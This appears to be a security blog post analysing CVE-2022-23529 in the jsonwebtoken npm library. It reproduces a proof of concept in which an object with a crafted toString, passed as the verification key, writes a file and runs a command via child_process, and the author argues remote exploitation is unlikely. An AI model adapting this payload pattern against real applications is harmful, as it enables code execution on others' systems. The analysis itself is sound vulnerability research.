JWT Arbitrary Command Execution - CVE-2022-23529

Jan 12, 2023

Introduction

An arbitrary code execution issue affecting the jsonwebtoken npm package (node-jsonwebtoken) in versions 8.5.1 and earlier has been registered as CVE-2022-23529. It is triggered through the secretOrPublicKey argument of jwt.verify(), which is the server's own key material and not something an attacker normally controls; that detail drives the exploitability discussion below.

Library details

  • Description:

JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA or ECDSA.

  • Website: https://jwt.io/

  • Source code: https://github.com/auth0/node-jsonwebtoken

The vulnerability

When a user accesses a protected page, the back-end passes the incoming token to the library's verify method. The signature is verify(token, secretOrPublicKey, [options], [callback]): the first parameter is the attacker-supplied token, the second is the secret (HMAC) or public key (RSA/ECDSA) the server uses to check the signature.

The bug is in how the second parameter is handled. If an object with a crafted toString method is passed as secretOrPublicKey, verify invokes that toString and whatever code it contains runs. Because the second argument is the server's key, an attacker needs some way to control what the application passes there, which is the crux of the exploitability question in this write-up.

The End Game

Based on what Unit 42 discovered, and also on my own analysis, it's not easy or obvious how to achieve full RCE.

I want to show the analysis I did here, along with my final thoughts explaining why I don't think this is RCE, or why I don't see real exploitation behind it.

Maybe I’m wrong, or Maybe I’m right :D Who knows!

Prerequisites

  • Install Node.js

sudo apt install nodejs
  • Install npm

sudo apt install npm
  • Install jsonwebtoken version 8.5.1 or earlier (the last affected version).

npm i jsonwebtoken@8.5.1

  • An understanding of how JWTs and the jsonwebtoken library work.

I won’t go into detail here, but I will explain the basics of the structure of JWT and how it works.

I will provide references so you can dive in depth with it if you like.

Basically, a JWT consists of three base64url-encoded parts separated by dots (header.payload.signature):

  • Header: algorithm and token type

  • Payload: the claims (data)

  • Signature: computed over the encoded header and payload with the secret (HMAC) or private key (RSA/ECDSA), and checked on every verify

Example:

When the user logs in, the request with username and password goes to the auth server. The auth server verifies the username and password and, if they are valid, generates a JWT for this user.

From then on, each time the user visits any page or route, the JWT is sent with the request headers (typically in an Authorization: Bearer header) and the back-end verifies its signature before trusting the claims.

https://dev.to/kcdchennai/how-jwt-json-web-token-authentication-works-21e7

https://jwt.io/introduction

Dynamic Analysis

I started by reproducing what Unit 42 already explained.

I'm using Ubuntu, so you can start the Node.js REPL by typing the command

nodejs

Import jsonwebtoken.

jwt = require('jsonwebtoken');

Generate token

token = jwt.sign({"x":"y"}, 'some_secret');

This is the proof-of-concept object Unit 42 used: a plain object whose only property is an attacker-supplied toString function.

var mal_obj = { toString : ()=> {console.log('PWNED!!!');process.on('exit', ()=> {require('fs').writeFileSync('malicious.txt', 'PWNED!!!!');});process.exit(0)}}

Now, pass the token and the malicious object to verify (the object goes in the secretOrPublicKey position, not the token position):

jwt.verify(token, mal_obj)

You will see PWNED!!! printed on the console, a file called malicious.txt is created, and "PWNED!!!!" is written inside it.

This happens because verify calls toString() on the object, and that is exactly what the toString function does: print the message, register an exit handler that writes the file, and then exit the process.

I also wanted to see if I could execute commands, so I used this payload

var mal_obj = { toString : ()=> {process.on('exit', ()=> {require('child_process').exec('firefox');});process.exit(0)}};

and Firefox launched.

Static Analysis

Let's do some code review and see what went wrong.

Download the source code of jsonwebtoken 8.5.1 from here:

https://github.com/auth0/node-jsonwebtoken/releases/tag/v8.5.1

Open verify.js.

This is where the vulnerable snippet identified in the Unit 42 report lives. When the caller does not pass options.algorithms, verify calls secretOrPublicKey.toString() and searches the result for "BEGIN CERTIFICATE" / "BEGIN PUBLIC KEY" / "BEGIN RSA PUBLIC KEY" to decide which algorithms to allow. Nothing checks that secretOrPublicKey is actually a string, Buffer or key object first, so an arbitrary object's own toString is what gets invoked.

After I tried to craft/edit/manipulate the JWT token itself, it didn't really work.

In fact, it makes sense why it didn't work: the payload is supposed to go into the second parameter of the verify method (marked in red), but the token is the first parameter (marked in blue).

Final thoughts

To be honest, I'm not sure how this can be exploited remotely, or even if you have access to the back-end. However, based on what's mentioned in the "Exploitation Prerequisites" section of the Unit 42 report, it looks like there is no obvious scenario to exploit this.

Also, based on the comments on the GitHub commit here, it looks like a lot of people agree with that as well.

Some ideas for more in-depth research I was thinking about:

  • Maybe finding some misconfiguration scenario for JWT would help with exploiting this vulnerability.

  • I was thinking about how those parameters get stored. For example, in smart contracts, variables live in memory slots, so you could overwrite the second variable, in our case the secretOrPublicKey variable.


Written by

Mohammad Hussam Alzeyyat
